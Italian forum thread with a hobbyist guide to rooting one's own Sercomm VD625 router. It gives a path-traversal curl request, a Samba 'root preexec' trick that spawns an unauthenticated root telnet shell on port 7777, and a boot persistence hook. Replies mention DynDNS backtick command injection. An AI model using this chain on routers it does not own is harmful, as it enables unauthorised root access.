[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)

  • 108 Risposte
  • 10272 Visite

0 Utenti e 3 Visitatori stanno visualizzando questo topic.

Offline xMase

  • Nuovo Iscritto
  • *
  • 14
[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« il: 08 Aprile 2019, 12:34 »
Come da titolo vi mostro il procedimento per root/sblocco del Sercomm VD625 (firmware 2.0.0):

- attivare le condivisone usb inserendo una chiavetta formatta in fat32 con dentro il file runme:

Codice: [Seleziona]
    #!/bin/sh
    exec > /mnt/shares/USB2FlashStorage/Partition1/it_worked 2>&1
    set -x
    ps
    date
    iptables -D INPUT -i ! br0 -p tcp --dport 7777 -j DROP >/dev/null 2>&1
    iptables -I INPUT -i ! br0 -p tcp --dport 7777 -j DROP   
    /bin/telnetd -F -p 7777 -l /bin/sh&

- eseguire la chiamata da curl per attivare la condivisione di / del router:

(csrf_token va aggiornato ogni volta prendendolo dalla webgui da una richiesta a caso)

Codice: [Seleziona]
curl -X POST -i 'http://192.168.1.1/data/settings_content_sharing_device.json?_=1551786266690&csrf_token=HK08CC1C89JW113A2638' --data 'sharing_device=[{"device_id":"1","root_folder":"/","ns_content_sharing_enable":"1","ns_require_username_password":"0","ns_user_id":"1","ns_share_all_folders":"0","ns_share_folder_data":"1|root|../../../:0|Partition1|:"}]'
- una volta fatto ciò disattivare e riattivare la condivisione usb dalla webgui del router per applicare le modifiche

- andiamo con dolphin sulla cartella appena condivisa (se su windows andiamo con condivisione di rete)

    smb://[email protected]/

- il processo samba è spawnato con utente nobody e quindi senza privilegi di root per ovviare al problema sostituire il file
    smb.conf del router presente nella cartella condivisa /root/etc/samba/ (una delle poche cartelle con permessi di scrittura)

- il file smb.conf non fa altro che aggiungere/sostituire:

Codice: [Seleziona]
    [global]
    ...
    log file = /tmp/a1
   
    config file = /etc/samba/smb.conf (remove this)

    [Partition1]
    ...
root preexec = /bin/sh -c "/mnt/shares/USB2FlashStorage/Partition1/runme &"

- questo non farà altro che forzare smb ad eseguire come root il comando presente sulla chiavetta inserita da cui partirà
    il pocesso di telnet come root sulla porta 7777

- per avviare il tutto navigare sulla cartella condivisa /Partition1/USB2FlashStorage/Partition1/ e /root/etc/samba/ e refreshare

- nella cartella /tmp/ apparirà a1 un log di smbd per debuggare eventuali problemi

- nella cartella /Partition1/USB2FlashStorage/Partition1/ apparirà il file it_worked che ci dimostrerà il buon esito del tutto

- ora non ci resta che conneterci con telnet all'ip del router sulla porta 7777

- rimontare la root in rw si può fare senza problemi di signature (/dev/mtdblock7 - /dev/mtdbloc6 in questo caso sono sul blocco 7)

Codice: [Seleziona]
    mount -n -t jffs2 -o rw,remount /dev/mtdblock7 /
- inserire in /etc/rcS:
Codice: [Seleziona]
    ...
    dopo questa linea "mount -n -t ramfs ramfs /tmp":
    ...
    #log
    exec > /tmp/bootlog 2>&1
    set -x
    ...
    modificare questa linea "rc init > /dev/null" in rc "init"
    ...
    dopo l'ultima linea:
    ...
    # my
    mkdir -m 0777 /mnt/my/
    mount -n -t vfat -o rw /dev/sda1 /mnt/my/
    /usr/sbin/ls "/mnt/my"
    ((/usr/sbin/sh /mnt/my/runme 0<&- &>/dev/null &) &)

- prima di riavviare disattivare le cartelle condivise dal router e rimontare in ro la partizione /

Codice: [Seleziona]
    mount -n -t jffs2 -o ro,remount /dev/mtdblock7 /
    reboot

*** SercommVD625.iso Telecom Italia_VD625_AGSOT_1.0.8.tar/Telecom Italia_VD625_AGSOT_1.0.8/VD625_v1.0.8/build/VD625/target.tgz (file della gui)
*** AGSOT_1.0.8.img (per estrarre l'immagine utilizzare prima sercomm_fwutils-master per img e poi jefferson per il kernel)
*** Per scaricare la configurazione del router usare il comando "cmld_client get_node Device."


https://github.com/xMase/Sercomm-VD625

PS: è ancora grezzo però, se volete partecipare sentitevi liberi di inoltrare delle pull request sul repository
« Ultima modifica: 09 Aprile 2019, 12:20 da xMase »

Offline ftp21

  • Membro Anziano
  • ***
  • 189
  • Sesso: Maschio
    • valerio@ftp21~/ # ./just4fun
Re:Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #1 il: 09 Aprile 2019, 11:02 »
@xMase sulla 2.0.1 non funziona perché smb.conf è scrivibile solo da root.

Sulla 1.0.8 puoi anche scrivere sul file /tmp/cmd_agent e tutto quello che scrivi lì dentro viene eseguito
Inoltre dal Dyndns hai un command execution sulla username inserendo i backtick

Offline xMase

  • Nuovo Iscritto
  • *
  • 14
Re:Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #2 il: 09 Aprile 2019, 11:07 »
io ho provato sulla 2.0.0 e funzionava senza problemi appena ho un po' di tempo provo ad aggiornare alla 2.0.1 e vedere cosa si può fare.

Offline MisterFTTH

  • Global Moderator
  • Esperto
  • *****
  • 822
  • Sesso: Maschio
  • Io vi cercherò, vi troverò...e vi bannerò!
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #3 il: 09 Aprile 2019, 12:04 »
@xMase di questo argomento si stava già discutendo in altra sezione dedicata ma per praticità abbiamo scelto di rendere "ufficiale" il tuo topic con relativa guida già abbastanza strutturata, pertanto ti chiediamo la cortesia di mantere aggiornato nel limite del possibile il tuo intervento di apertura, aldilà del repository Github, in modo da fornire sempre il miglior punto di partenza per i nuovi "avventori"  ;)
Prima di scrivere...leggi la Netiquette del Forum!

Offline LuKePicci

  • Esperto
  • ****
  • 1035
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #4 il: 26 Aprile 2019, 20:26 »
Ma la versione di cups sui nuovi 2.x.x è ancora quella bucata che c'era un paio d'anni fa sugli 1.0.x?

Offline nice.guy12

  • Membro Anziano
  • ***
  • 222
  • Sesso: Maschio
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #5 il: 27 Aprile 2019, 10:12 »
che novita porta questa modifica? scusate l`ignoranza.

Offline xMase

  • Nuovo Iscritto
  • *
  • 14
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #6 il: 27 Aprile 2019, 17:02 »
Questa procedura di per se porta soltanto l'accesso come root al router tramite telnet.
« Ultima modifica: 27 Aprile 2019, 17:36 da MisterFTTH »

Offline maximumwarp

  • Membro Giovane
  • **
  • 63
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #7 il: 28 Aprile 2019, 15:54 »
Scusa la domanda che può risultare stupida o poco interessante ma devo fartela: ottenere l'accesso come root attualmente a quali benefici potrebbe portare? Flash di qualche firmware alternativo?
« Ultima modifica: 28 Aprile 2019, 16:17 da MisterFTTH »

Offline Fabax01

  • Membro Giovane
  • **
  • 62
  • Sesso: Maschio
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #8 il: 28 Aprile 2019, 19:21 »
Bien, ottimo lavoro e un vivissimo grazie.
Per caso il fw è basato su qualcos'altro (ex. AGCombo basato su WRT) o è 100% fatto da sercomm? Era per vedere se ci fosse qualche documentazione per editing della configurazione, sopratutto se c'è un passtrough ip / bridge mode nascosta / cancellare interfaccie etc.


Offline xMase

  • Nuovo Iscritto
  • *
  • 14
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #9 il: 29 Aprile 2019, 17:18 »
Per caso il fw è basato su qualcos'altro (ex. AGCombo basato su WRT) o è 100% fatto da sercomm?

Il firmware è basato sull'uso di busybox ed eseguibili closed.
Per la configurazione basta usare questo comando "cmld_client get_node Device." per salvarla e usare "help del comando" per ricaricarla.

ottenere l'accesso come root attualmente a quali benefici potrebbe portare?

Sbloccare alcune funzioni attraverso l'uso del file di configurazione.
« Ultima modifica: 29 Aprile 2019, 17:55 da MisterFTTH »

Offline ciacula

  • Membro Giovane
  • **
  • 54
  • Sesso: Maschio
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #10 il: 10 Maggio 2019, 15:24 »
So che è una domanda un po' generica, ma vorrei trasformarlo in access point/gateway voip. Pensate si possa riuscire editando il file di configurazione? Premetto che non l'ho ancora sbloccato. Giusto per sapere se ne vale la pena.
« Ultima modifica: 10 Maggio 2019, 15:38 da ciacula »

Offline LuKePicci

  • Esperto
  • ****
  • 1035
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #11 il: 10 Maggio 2019, 15:31 »
No questo qui ha un firmware diverso simile a quello della Vodafone Power Station, non c'è su Openwrt quindi non esiste alcun file "network". Ogni distribuzione linux ha i suoi modi di fare le stesse cose.

Offline ciacula

  • Membro Giovane
  • **
  • 54
  • Sesso: Maschio
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #12 il: 10 Maggio 2019, 15:37 »
Scusa @LuKePicci : ho riformulato la domanda, probabilmente mentre mi stavi rispondendo...
Ok, quindi non mi resta che "aprirlo" e vedere se riesco a capirci qualcosa  :)
« Ultima modifica: 10 Maggio 2019, 15:40 da ciacula »

Offline Enrico98

  • Membro Giovane
  • **
  • 83
  • Sesso: Maschio
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #13 il: 10 Maggio 2019, 15:46 »
Una gui custom come quella di ansuel non ce per questo modem? È un po' inutile avere solo il root e non avere anche una gui modificata

Offline ciacula

  • Membro Giovane
  • **
  • 54
  • Sesso: Maschio
Re:[GUIDA] Root/sblocco Sercomm VD625 (AGSOT)
« Risposta #14 il: 11 Maggio 2019, 18:36 »
Dunque: ho provato la parte curl ed ho ottenuto:

Codice: [Seleziona]
HTTP/1.0 200 OK
Content-Type: text/html
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=http://www.example.com/xss

Quindi ho fatto ->  Abilita Content Sharing -> da on a off e viceversa.
Nessuna cartella, oltre alla condivisione usb, è presente tra le cartelle sotto "modemtim". Non riesco quindi a capire se:
1) la cartella non è stata condivisa correttamente
2) ho problemi con smb (ho windows 10)
« Ultima modifica: 11 Maggio 2019, 20:55 da MisterFTTH »